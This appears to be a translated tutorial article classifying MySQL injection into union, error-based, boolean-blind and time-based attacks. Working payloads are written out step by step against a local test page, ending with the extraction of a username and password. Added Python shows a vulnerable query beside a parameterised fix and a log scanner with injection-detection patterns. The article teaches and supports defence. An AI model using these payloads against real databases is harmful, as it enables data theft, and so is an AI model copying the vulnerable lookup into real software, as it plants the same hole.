2025-01-30 Update From: SLTechnology News&Howtos, Network Security
Shulou (Shulou.com) 06/01 Report--
This article covers the main categories of MySQL injection. It keeps close to the topic, so without further preamble let's go straight to the content; I believe you will benefit from reading it.
MySQL injection classification:
1. Error-based injection with display bits (union injection)
(1) Testing for injection
and 1=1: http://127.0.0.1/union.php?id=1 and 1=1
and 1=2: http://127.0.0.1/union.php?id=1 and 1=2
With and 1=1 the page returns the result, while with and 1=2 it returns nothing, which shows that the and clause was executed and that there may be SQL injection.
(2) Determining the number of columns
http://127.0.0.1/union.php?id=1 order by 1
http://127.0.0.1/union.php?id=1 order by 2
http://127.0.0.1/union.php?id=1 order by 3
http://127.0.0.1/union.php?id=1 order by 4
When probing how many columns the current query returns, order by 1, order by 2 and order by 3 all return normally, while order by 4 returns an error, so the query has three columns.
(3) Finding the display positions
In a union query, the rows of the second query are appended after the rows of the first select.
http://127.0.0.1/union.php?id=1 union select 1,2,3
With id=1, union select 1,2,3 shows no display bits, because the statement ends with limit 0,1, so only the first row of the result is displayed; the union row is only shown when the id lookup itself returns nothing.
http://127.0.0.1/union.php?id=-1 union select 1,2,3
With id=-1 the id lookup returns nothing, and the output shows the display bits 1, 2, 3.
(4) Obtaining the database name
With a display bit, we can substitute a query for the corresponding display bit to fetch what we want, such as the database name.
http://127.0.0.1/union.php?id=-1 union select 1,database(),3
The database name is s.
(5) Obtaining the tables
Then list the tables in the s database:
http://127.0.0.1/union.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='s'
Querying the tables table of information_schema shows that the only table in database s is student.
The information_schema database holds the names of all databases, all tables and all columns.
(6) Obtaining the columns
Next, query which columns the student table has:
http://127.0.0.1/union.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='student'
The information_schema database shows that the student table has three columns: id, username and password.
(7) Obtaining the content
Query the contents of username and password:
http://127.0.0.1/union.php?id=-1 union select 1,username,password from student
This returns the username and password columns of the student table: user root with password 123456.
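As an added illustration (not code from the original article), here is a stand-in for the union.php endpoint walked through above, written in Python against an in-memory SQLite table instead of MySQL, with the string-splicing bug beside a hardened lookup. The column layout (id, username, password) and the sample row root/123456 come from the article; the function names and the use of SQLite are assumptions.

```python
import sqlite3

# Constructed stand-in for the article's student table (assumption: SQLite
# instead of MySQL, same column layout and the same sample row as the article).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table student(id integer, username text, password text)")
    conn.execute("insert into student values (1, 'root', '123456')")
    return conn

def vulnerable_lookup(conn, raw_id):
    # The bug behind every payload on this page: request input is spliced
    # into the SQL text, so 'id=-1 union select 1,2,3' adds its own row and
    # 'id=1 and 1=2' silently filters the real row away.
    sql = ("select id, username, password from student where id="
           + raw_id + " limit 0,1")
    return conn.execute(sql).fetchone()

def hardened_lookup(conn, raw_id):
    # Fix 1: enforce the column's type before the value gets near SQL;
    # any payload containing spaces or keywords fails int() and is rejected.
    try:
        id_value = int(raw_id)
    except ValueError:
        return None
    # Fix 2: bind the value as a parameter, so it can only ever be data.
    sql = "select id, username, password from student where id=? limit 0,1"
    return conn.execute(sql, (id_value,)).fetchone()
```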
2. Error-based injection using database error messages (error injection)
There are ten kinds of error injection in MySQL.
Add an error-reporting statement to the script:
if (!$res) { die(mysql_error()); }
(1) Obtaining the database version
http://127.0.0.1/union.php?id=1 and (select 1 from (select count(*), concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1), floor(rand(0)*2)) x from information_schema.tables group by x) a)
(2) Obtaining the database names
Control which database is returned by adjusting LIMIT.
http://127.0.0.1/union.php?id=1 and (select 1 from (select count(*), concat((select (select (SELECT distinct concat(0x7e) FROM information_schema.schemata LIMIT 1) from information_schema.tables limit 0,1), floor(rand(0)*2) x from information_schema.tables group by x) a)
(3) Obtaining the tables of the current database
Different table names are likewise selected by adjusting LIMIT.
http://127.0.0.1/union.php?id=1 and (select 1 from (select count(*), concat((select (select (SELECT distinct concat(0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2) x from information_schema.tables group by x) a)
(4) Obtaining the column names of the users table (the payload below targets student)
http://127.0.0.1/union.php?id=1 and (select 1 from (select count(*), concat((select (select (SELECT distinct concat(0x7e) FROM information_schema.columns where table_name='student' LIMIT 1) from information_schema.tables limit 0,1), floor(rand(0)*2) x from information_schema.tables group by x) a)
(5) Obtaining the contents of the username and password fields
http://127.0.0.1/union.php?id=1 and (select 1 from (select count(*), concat((select (select (SELECT distinct concat(0x23 (0x23) FROM student limit 0,1)) from information_schema.tables limit 0,1), floor(rand(0)*2) x from information_schema.tables group by x) a)
Blind injection: when the injected statement executes there are no display bits and no database error messages, only a "correct" page and an "error" page. When the statement executes correctly the page returns normally; when it fails the page shows an abnormal interface, but never any database error message.
3. Error-based blind injection without database error information
(1) Blind injection using a union query
http://127.0.0.1/union.php?id=1 union select 1,2,122 order by 3
Sort by the third column: the first three values of the third column are not displayed if they are greater than 122, as shown in the figure.
http://127.0.0.1/union.php?id=1 union select 1,2,126 order by 3
And so on: modify the value in the third position to obtain information; the first three values of the third column are displayed if they are less than 126, as shown in the figure.
(2) Blind injection without a union query (ASCII)
Follow the idea of binary search (halving the range each time).
Guess the database name:
http://127.0.0.1/union.php?id=1 and ascii(substr(database(),1,1)) > 0
substr(database(),1,1) takes the database name one character at a time, starting with the first character.
The ascii() function converts the extracted character into its ASCII value.
As shown in the figure, the query returns a result, so the ASCII value of the first character of the database name is greater than 0.
http://127.0.0.1/union.php?id=1 and ascii(substr(database(),1,1)) > 120
As shown in the figure, no result is returned, so the ASCII value of the first character of the database name is less than 120.
http://127.0.0.1/union.php?id=1 and ascii(substr(database(),1,1)) = 115
By analogy, the ASCII value of the first character of the database name is 115.
Use the Xiaokui multi-function conversion tool to convert the ASCII value to its character: 115 is the letter s.
The rest of the database name can then be guessed in the same way.
Guess the table names of the database:
http://127.0.0.1/union.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema='s' limit 0,1),1,1)) = 115
By guessing ASCII values, you find that the ASCII code of the first character of the first table in the s database is 115, i.e. the character s. Guess the remaining characters the same way.
Guess the column names in the table:
http://127.0.0.1/union.php?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='student' limit 0,1),1,1)) = 105
The ASCII code of the first character of the first column name of the student table is 105, i.e. the character i; guess the rest in turn.
Guess the contents of the column:
http://127.0.0.1/union.php?id=1 and ascii(substr((select username from student limit 0,1),1,1)) = 114
The ASCII code of the first character of username is 114, i.e. the letter r; the rest is guessed in turn.
4. Time-based blind injection
Use Firefox's Firebug (F12) to monitor the execution time of the script.
http://127.0.0.1/union.php?id=1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)
Guess the database: when the condition holds, the statement is delayed by 3 seconds.
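As an added example of the defender's side of the four categories above (not code from the original article), the following Python scans web-server access-log lines for the signatures of union, error-based, boolean-blind and time-based probes against the union.php endpoint. The log lines are constructed from the article's own payloads, not real traffic, and the patterns are an assumption tuned to this page rather than a complete WAF ruleset.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures keyed to the four injection categories this article walks through.
# Assumption: illustrative patterns tuned to the article's own payloads, not a
# complete ruleset; a real deployment would also normalise comments and case tricks.
SIGNATURES = {
    "union": re.compile(r"\bunion\b.*\bselect\b|\border\s+by\s+\d+"),
    "error": re.compile(r"floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b"),
    "boolean": re.compile(r"\bascii\s*\(\s*substr\s*\(|\band\s+1\s*=\s*[12]\b"),
    "time": re.compile(r"\bsleep\s*\(|\bbenchmark\s*\("),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_request_target(target):
    """Decode every query parameter of one request target; return matching categories, sorted."""
    hits = set()
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            text = re.sub(r"\s+", " ", value).lower()  # collapse %20/%09 padding
            hits.update(name for name, rx in SIGNATURES.items() if rx.search(text))
    return sorted(hits)

def scan_access_log(lines):
    """Return (client_ip, target, categories) for each request that trips a signature."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        categories = classify_request_target(match.group(1))
        if categories:
            findings.append((line.split(" ", 1)[0], match.group(1), categories))
    return findings

# Constructed access-log lines modelled on the article's payloads (not real traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [30/Jan/2025:10:00:00 +0000] "GET /union.php?id=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [30/Jan/2025:10:00:01 +0000] "GET /union.php?id=1%20and%201=2 HTTP/1.1" 200 128',
    '127.0.0.1 - - [30/Jan/2025:10:00:02 +0000] "GET /union.php?id=1%20order%20by%204 HTTP/1.1" 500 93',
    '127.0.0.1 - - [30/Jan/2025:10:00:03 +0000] "GET /union.php?id=-1%20union%20select%201,2,3 HTTP/1.1" 200 530',
    '127.0.0.1 - - [30/Jan/2025:10:00:04 +0000] "GET /union.php?id=1%20and%20(select%201%20from%20(select%20count(*),'
    'concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 210',
    '127.0.0.1 - - [30/Jan/2025:10:00:05 +0000] "GET /union.php?id=1%20and%20ascii(substr(database(),1,1))=115 HTTP/1.1" 200 512',
    '127.0.0.1 - - [30/Jan/2025:10:00:06 +0000] "GET /union.php?id=1%20and%20if(ascii(substr(database(),1,1))=115,sleep(3),1) HTTP/1.1" 200 512',
]
```

Running scan_access_log(SAMPLE_LOG) flags six of the seven lines and leaves the plain id=1 request alone; the time-based probe is reported under both boolean and time because it carries the ascii(substr(...)) comparison as well as the delay.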
That covers the main categories of MySQL injection. Is there anything you don't understand, or want to know more about? If so, you can continue to follow our industry information section.